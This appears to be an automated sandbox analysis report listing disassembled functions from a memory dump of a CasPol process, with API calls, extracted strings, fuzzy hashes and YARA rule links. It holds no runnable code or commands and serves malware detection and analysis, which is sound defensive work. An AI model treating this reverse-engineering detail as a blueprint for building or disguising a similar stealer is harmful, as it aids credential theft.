                                                                                                                                                                                    • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                    Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                    • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                    • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                    • API String ID: 3510742995-272990098
                                                                                                                                                                                    • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                    • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                    • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                    • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                    Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                    • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 1297977491-4203073231
                                                                                                                                                                                    • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                    • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                    • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                    Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                      • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                    • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                                                    • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                                                    • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                    Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                    • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                    • free.MSVCRT ref: 004174E4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4053608372-0
                                                                                                                                                                                    • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                    • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                                                                                                                                                    • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                    Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                                                    • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                    • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                                                                                    Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                    • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                      • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                      • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1471605966-0
                                                                                                                                                                                    • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                    • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                                                                                    • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                    Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0044475F
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044476E
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044477F
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0044478E
                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                      • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                                                                                      • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                                                                                    • String ID: \StringFileInfo\
                                                                                                                                                                                    • API String ID: 102104167-2245444037
                                                                                                                                                                                    • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                    • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                                                                                    • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                                                                                    Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                    • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                                                                                    Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _memicmpwcslen
                                                                                                                                                                                    • String ID: @@@@$History
                                                                                                                                                                                    • API String ID: 1872909662-685208920
                                                                                                                                                                                    • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                    • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                                                                                                                    Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                    • memset.MSVCRT ref: 00410112
                                                                                                                                                                                      • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                      • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                    • API String ID: 3400436232-259020660
                                                                                                                                                                                    • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                    • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                    • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                    Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D58D
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                                                                                    • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                                                                                    • String ID: caption
                                                                                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                                                                                    • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                    • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                                                                                    Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                      • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                                                    • API String ID: 210187428-168460110
                                                                                                                                                                                    • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                    • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                    Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassName_wcsicmpmemset
                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                    • API String ID: 2747424523-2167791130
                                                                                                                                                                                    • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                    • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                                                                                                                                    Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,shlwapi.dll,750A375A,?,00405751,00000000), ref: 00414E2B
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                                                    • API String ID: 3150196962-1506664499
                                                                                                                                                                                    • Opcode ID: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                                                                    • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                                                                                                                                                    • Opcode Fuzzy Hash: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                                                                                                                                                                                    • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                                                                                                                                                    Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041D8CB
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0041D913
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3384217055-0
                                                                                                                                                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                                                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                                                                                    Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                                                    • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                                                                                                    • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                                                                                                    Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                                                                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                                                                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                                                                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                                                                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
